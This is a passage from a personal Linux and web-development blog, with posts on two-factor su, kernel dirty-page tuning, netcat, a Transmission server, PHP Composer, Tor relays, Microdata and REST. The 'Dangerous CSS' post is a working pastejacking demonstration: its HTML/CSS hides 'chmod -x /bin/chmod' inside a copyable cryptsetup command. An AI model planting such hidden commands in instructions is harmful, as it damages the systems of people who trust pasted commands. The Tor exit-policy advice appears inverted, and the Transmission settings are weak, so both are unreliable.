Cinan's world

GNU/Linux & free software, howtos, web development, scripts and other geek stuff

`$ su -’ With Two-Step Authentication

TL;DR

Log in with user’s password and verification code obtained from Google Authenticator mobile app.

Intro

I really like a two-step authentication (or two-factor) idea. I use everywhere I can (Google accounts, Bitstamp, Facebook…); so I get this idea: logging in as root would require correct user’s password and some verification code obtained from my phone. I found very easy-to-use solution: Google Authenticator.
It’s an open-source project (Apache License 2.0) so if you’re paranoid go and check if it doesn’t contain some backdoor ;) The Authenticator app provides a random one-time password(verification code) users must provide in addition to their password.

I access my server via password-less ssh login (ssh alterego@my.server) and then I log in as root (su -). I set up Google Authenticator to ask for verification code after inserting correct root’s password. Let’s do that right now.

Installation and usage

Install PAM library and tools: libpam-google-authenticator. Log in as root and run google-authenticator. It generates a key and emergency codes (useful if you lost your phone). In your phone enter generated secret key (type of the key is ‘time based’).

Then paste to the last line in /etc/pam.d/su:

auth required pam_google_authenticator.so

Now everything’s should be set up.

  1. You’re logged in as a regular user
  2. Fire su -
  3. Enter your password
  4. Enter verification code from your phone
  5. ???
  6. Profit.

Fix System Freezing While Copying to a Flash Drive

I copied about 10 GiB data from my hard drive to a USB3.0 flash drive. Much to my surprise the system started freezing, songs playback became interrupted, etc. Eventually I had to wait until the copying process finished.

Well, something like that is simply unacceptable if you have 8-core i7 processor, 8 GiB RAM and SSD.

So I’ve found a simple solution. The problem was wrong setting of dirty pages (because of historical reasons). It’s a well-known Linux kernel problem.

What I did was:

1
2
3
echo 0 > /proc/sys/vm/dirty_background_ratio
echo 33554432 > /proc/sys/vm/dirty_background_bytes
echo 66554432 > /proc/sys/vm/dirty_bytes

After applying these changes CPU load dropped from 6 to 3 and system was fast and responsive. To make that changes persistent add the lines below to /etc/tmpfiles.d/dirty.conf:

1
2
3
w /proc/sys/vm/dirty_background_ratio - - - - 0
w /proc/sys/vm/dirty_background_bytes - - - - 33554432
w /proc/sys/vm/dirty_bytes - - - - 66554432

Maybe it’s already fixed in current kernel, I don’t know. I’m running OpenSUSE 13.1 with 3.11.10-7-desktop kernel.

Unix Beauty – Copy & Paste Between Machines

Redirecting standard output and using it to put that output to a file is well-known and easy. Almost that easily any output can be redirected from one machine to another one. Say hello to nc utility.

nc is part of netcat package which comes in two flavors in most of Linux distributions: nc-traditional and nc-openbsd. In examples below I use -traditional.

On the first machine start listening on some port:

1
$ nc -lp 12345 > ~/file_received

Then, on another machine run something like this:

1
$ cat send_file | nc <hostname> 12345

That’s all. First machine starts listening on port 12345 and another machine sends stream of data to that port. The communication isn’t encrypted so for transmitting sensitive data use scp.

Dangerous CSS: How to Unnoticeably Destroy *nix System

Let’s do bad things. I’ve got an idea – provide a nice looking Linux command on a blog/wiki. Yep, that’s almost all.

Imagine you’re setting up dm-crypt encryption. You’ll find a guide with commands ready to copy & paste into your terminal. Almost all commands have to be run as root, that’s good for me. Something like this:

1
cryptsetup -v --cipher aes-xts-plain64 --key-size 256 --hash sha512 --iter-time 5000 --use-urandom --verify-passphrase luksFormat <device>

Oh, almighty CSS, now it’s your turn. Go to this page and copy the command. I added some javascript stuff to make text selecting easier – javascript isn’t required. Now paste the copied text somewhere. As you can see, there’s bonus command (chmod -x /bin/chmod). Nice, isn’t it?

Code, obviously:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
<html>
<head>
  <script src="http://code.jquery.com/jquery-1.11.0.min.js"></script>
  <script src="http://code.jquery.com/jquery-migrate-1.2.1.js"></script>
  <script>
      // Makes selecting text easier
      jQuery.fn.selText = function() {
          var obj = this[0];
          if (jQuery.browser.msie) {
              var range = obj.offsetParent.createTextRange();
              range.moveToElementText(obj);
              range.select();
          } else if (jQuery.browser.mozilla || jQuery.browser.opera) {
              var selection = obj.ownerDocument.defaultView.getSelection();
              var range = obj.ownerDocument.createRange();
              range.selectNodeContents(obj);
              selection.removeAllRanges();
              selection.addRange(range);
          } else if (jQuery.browser.webkit) {
              var selection = obj.ownerDocument.defaultView.getSelection();
              selection.setBaseAndExtent(obj, 0, obj, obj.innerText.length - 1);
          }
          return this;
      }
      
      $(document).ready(function() {
          $('pre').click(function(e) {
              e.preventDefault();
              $(this).selText();
          })
      });
  </script>
  <style>
      *::selection {
          background: rgb(95, 196, 243);
      }
      
      /* INTERESTING PART */
      span {
          width: 1px; /* can't be 0px */
          white-space: nowrap;
          display: inline-block;
          overflow: hidden; /* text hiding */
          color: transparent; /* text hiding */
          vertical-align: middle;
          position: absolute;
      }
      
      pre {
          display: inline-block;
          white-space: nowrap;
          overflow: hidden;
          border: 1px solid #bcd;
          background-color: #ebf1f5;
          color: #222;
          font-family: monospace;
          line-height: 1.1em;
          padding: 1em;
      }
      
      pre:first-of-type {
          border-right: 0;
          padding-right: 0;
      }
      
      pre:last-of-type {
          border-left: 0;
          padding-left: 2ex;
      }
  </style>
<body>
  <pre>#</pre><pre>cryptsetup -v --cipher aes-xts-plain64 --key-size 256 --hash
      sha512 --iter-time 500<span>;chmod -x /bin/chmod; </span>0 --use-urandom --verify-passphrase luksFormat &lt;device&gt;
  </pre>
</body>
</html>

What’s happening here: I’m selecting pre content which also contains another span element. Tested on Chromium, Firefox, Opera and Safari.

Download Torrents on Your Server

tl;dr

  • How to setup Transmission web client on your Linux server
  • Firewall setup
  • Email notifications setup

Why am I doing this?

Recently I’ve needed to download some stuff from torrentz. I have quite unstable and slow internet connection at home, so I’ve decided to download the stuff to my server and later transfer it to my laptop via rsync (with transfer resume enabled and high compression ratio).

Choose a torrent client

There are many torrent clients suitable for headless Linux server (so they don’t need X.Org server and allow remote access). I’ve picked out Transmission. It looks easy to configure & use, supports magnet links, is lightweight, has web interface and is actively developed.

Install & configure

If your Linux distribution provides split Transmission package, you need just transmission-cli or transmission-daemon (simply, ignore GTK or Qt packages).

After installation edit Transmission daemon configuration file (may be located here /var/lib/transmission/.config/transmission-daemon/settings.json or here /etc/init.d/transmission-daemon/settings.json).

Interesting options you’ll probably need to edit are these:

  • encryption: 2 (Require encrypted connections)
  • rpc-enabled: true (Required for Transmission web client)
  • rpc-password: “” (Put some password, after transmission-daemon restart it will be hashed)
  • rpc-port: 9091
  • rpc-whitelist-enabled: false (if you have dynamic public IP address you want disable this option)
  • umask: 0 (Give access to downloaded files to everybody – files have read & write permissions for owner, group and others)

If you’re a bitch and want to disable seeding right after torrent download is completed, set ratio-limit to 0 and ratio-limit-enabled to true.

Try web interface

You don’t need any HTTP server like Apache or Nginx, just go to http://your_domain:9091. Enter login username (by default empty) and password. That’s all.

Open ports in your firewall

Find peer-port option in transmission config. Open this port in /etc/iptables/iptables.rules:

-A INPUT -p tcp -m tcp --dport 51413 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 51413 -j ACCEPT
-A OUTPUT -p udp -m udp --dport 80:60000 -j ACCEPT

Port 51413 has to be opened otherwise Transmission cannot download and upload data. Also I’ve opened a range of UDP ports because of magnet links.

Hey! Downloading is finished!

Transmission daemon can run any script after downloads are completed. First I’ve set script-torrent-done-enabled to true and inserted full path to the script into script-torrent-done-filename option.

Here’s my script:

1
2
#!/usr/bin/env bash
echo "'$TR_TORRENT_NAME' is finished!" | gnu-mail -a "From: cinan.remote@gmail.com" -s "Torrent download finished" cinan6@gmail.com

Dependency Management in PHP Projects #2

In the last article about dependency management I’ve explained why we, PHP programmers, need composer and why you should use it in your PHP projects.

Let’s dig deeper in composer internals.

Where can I find packages for composer?

Many of packages which we can use as project dependencies can be found on packagist.

Dependency versioning

Let’s say our project depends on Twig library. The require section in composer.json file will look like this:

1
2
3
 "require": {
        "twig/twig": "1.12.*"
    }

The file says we want Twig version at least 1.12.0. Composer will install the newest minor version (e.g. 1.12.1 or 1.12.3) of major version 1.12. We’ll never get Twig 1.11 or Twig 1.13 or Twig 2.0.

We can define an exact version of Twig like this: "twig/twig": "1.12.1".

Maybe we want any newest development version. It’s simple: "twig/twig": "dev-master". Now composer will install newest bleeding-edge version from master branch from Twig’s Git repository. The used schema is: dev-<branch>.

Using custom dependencies

If you have your own libraries you want to use in a project, add repositories section to the composer.json. It contains array of VCS repositories.

Let’s say you want to use a library hosted on github. Then the repositories section can look like this:

1
2
3
4
5
6
 "repositories": [
      {
          "type": "git",
          "url": "https://github.com/vendor/example.git"
      }
  ]

In type field we said it’s a Git repository and an address of the repository is defined in url field.

Then, you can edit the require section:

1
2
3
4
 "require": {
      "twig/twig": "1.12.*",
      "vendor/example": "dev-master"
  }

Now composer update will fetch code of “example” library from https://github.com/vendor/example.git repository.

How my project knows about installed dependencies?

Composer creates autoload.php file in vendor directory. The file takes care of dynamic autoloading of all dependencies. Dynamic means all required files are loaded when they are needed. If we had defined 20 dependencies, it would be very inefficient and slow to load all files.

When some dependency class is used for the first time, composer’s Autoloader gets called and tries to find and load needed files.

I believe an example below enlightens the question. All you need to do is to include autoload.php file in your project.

index.php
1
2
3
4
5
6
7
8
9
10
11
12
  <?php
  
  // load autoload.php
  require 'vendor/autoload.php';
  
  // how many files has been loaded so far
  echo "Number of loaded files: " . count(get_included_files()) . "\n";

  // can use Twig class
  $loader = new Twig_Loader_String();
  
  echo "Number of loaded files: " . count(get_included_files()) . "\n";

The example is very simple, I just wanted to show dependency autoloading just works. By the way, the output is:

Number of loaded files: 6
Number of loaded files: 9

First time a counter was called there were loaded only composer files. Next time composer loaded more files required by Twig.

Very interesting topic about autoloading of your own code is explained on composer official guide.

This article was also published on my school blog.

Join the Deep Web as a Tor Relay

As a long term fan and occasional user of the Tor network I’ve decided to run a Tor middle relay. It’s some kind of a way of payback to Tor community. Another way how to help Tor network is running exit node or a bridge. The requirements are: a server running on a relatively secure operating system (*BSD or GNU/Linux would be my choice. No offense.) and bandwidth at least 20KiB/s up & down.

An installation is quite easy, just install tor package from repositories. Or compile Tor from sources.

Now edit your torrc file (located here /etc/tor/torrc or /etc/torrc). By default Tor is configured as a Exit relay, which can be risky (depending on your country’s law). If you don’t want to deal with abuse issues (when someone is doing some illegal shit via your relay) then change your ExitPolicy line; comment out this line:

ExitPolicy reject *:*

Now you’ll be acting as a “middleman”. If you want to run an Exit relay be sure to read tutorials and many tips about Exit relays.

Next, change speed limit for relay traffic. Change lines RelayBandwidthRate and RelayBandwidthBurst as you need.

You can choose a name for your relay on a Nickname line.

Finally, open a port (the default 9001 is OK) in your firewall (ORPort line).

Now you can start Tor daemon. Check out your Tor logs. After a while you’ll can see a line

Now checking whether ORPort <your-ip>:<your-port> is reachable...

and after that (if you configured Tor correctly) will appear:

Self-testing indicates your ORPort is reachable from the outside. Excellent. Publishing server descriptor.

You can find a list of Tor relays here or here.

Dependency Management in PHP Projects #1

Programmers use many 3rd party libraries in their projects. Problems may occur if programmers are developing a project and they don’t have same libraries or same versions of libraries. Dependency managers solve this problem in an elegant way. If you don’t know about them, I’m sure you’ll love them.

Introduction to Composer

Composer is a multi-platform and easy to use dependency manager for PHP. It’s working on Windows, GNU/Linux, BSD, OS X, whatever. You need PHP 5.3.2+.

Installation is pretty easy, here’s the official howto.

First, go to the project’s root directory and define project dependencies in composer.json file (right, it’s a file written in JSON :) ).

Here’s a real-world example from Gitlist project (licensed under New BSD license):

composer.jsonlink
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
{
    "require": {
        "silex/silex": "1.0.*@dev",
        "twig/twig": "1.12.*",
        "symfony/twig-bridge": "2.2.*",
        "symfony/filesystem": "2.2.*",
        "klaussilveira/gitter": "dev-master"
    },
    "require-dev": {
        "symfony/browser-kit": "2.2.*",
        "symfony/css-selector": "2.2.*",
        "phpunit/phpunit": "3.7.*",
        "phpmd/phpmd": "1.4.*",
        "phploc/phploc": "1.7.*"
    },
    "minimum-stability": "dev",
    "autoload": {
        "psr-0": {
            "GitList": "src/"
        }
    }
}

The file defines which dependencies the project requires (in require object), dependencies for development environment are listed in require-dev object.

Now we can run composer install. When the task finishes all dependencies are installed in vendor directory and we can use them in the project.

Same versions everywhere

The installing process created composer.lock file. There’s saved a list of installed dependencies along with their versions. This is necessary for keeping same versions of dependencies across all computers where the project has been deployed. If you’re interested in how the file looks like, check this out.

For example, there are two programmers (Programmer#1 and Programmer#2). Both of them have installed dependencies from composer.json above. Then, Programmer#1 wants to upgrade twig from 1.12 to to 1.13 because of new features he desperately needs. So he updates composer, after that runs composer update so dependencies get updated and commits changes to VCS they use (Git, SVN, …). What he actually commits? Only composer.json and composer.lock. In that files is everything what others may need to keep their systems up-to-date. (Actually, just the lock file is needed. Programmer#1 knows Programmer#2 will may want to change dependencies in future, so he commits composer.json.)

Never commit vendor directory.

Next day Programmer#2 pulls changes from VCS and he can see composer files were changed. So he fires up composer update and after few seconds he has exactly same version of dependencies as Programmer#1. It was so easy, just one command.

Summary of what we know so far

  1. First, create a composer.json file in the root directory of a project.
  2. Define project dependencies.
  3. Run composer install.
  4. Commit changes to VCS of your choice. Don’t forget you never commit vendor directory.

If you later change dependencies, edit and save the json file, run composer update and commit json and lock files.

Maybe you’re asking What’s the difference between install and update commands? It’s simple.

  • The update command uses composer.json file, installs dependencies defined in it and in the and it creates/rewrites the lock file.
  • The install command installs dependencies from a lock file. If no lock file exists it behaves like the update command.

In the second part of this article I’ll explain dependency versioning and reveal how the installed dependencies are integrated into projects.

This article was also published on my school blog.

Make Your Website Semantic With Microdata

Semantic web is getting more and more important. It’s not just another buzzword. Semantic web allows data to be shared and reused across application, enterprise, and community boundaries [1]. One of benefits is that web pages with a clear semantic structure are more understandable for search engines.

If a website should be semantic then its source code (HTML) has to be semantic. HTML5 semantic elements aren’t good enough because they are too general. So let’s extend HTML5. We have a few choices here – RDFa and some microformats.

One of microformats is Microdata. Microdata is actually a set of HTML attributes and elements used to describe meaning of web page content. I’ll illustrate how simply it can be used.

Why I chose Microdata? I think it has simpler syntax than RDFa and because of schema.org (I’ll explain later in the article).

Example of turning non-semantic HTML into semantic HTML

Example of a curriculum vitae header

With Microdata attributes

A Quick Look at REST

Three months ago I’ve chosen a REST architecture for designing my new project at work. The project goal is to create API for managing gyms, trainings and trainees.

This article is just light intro to the REST world, don’t expect cool tips & tricks (maybe in next article).

HTTP request methods

REST without using proper HTTP methods is a nonsense. There are about 9 methods but we need only 4.

  • POST – create a new resource
  • GET – get resource data
  • PUT – update a resource
  • DELETE – delete a resource

There is also PATCH method which is very similar to PUT method. In fact PUT should rewrite a whole resource and PATCH only update some attributes of a resource. More about PUT vs PATCH here.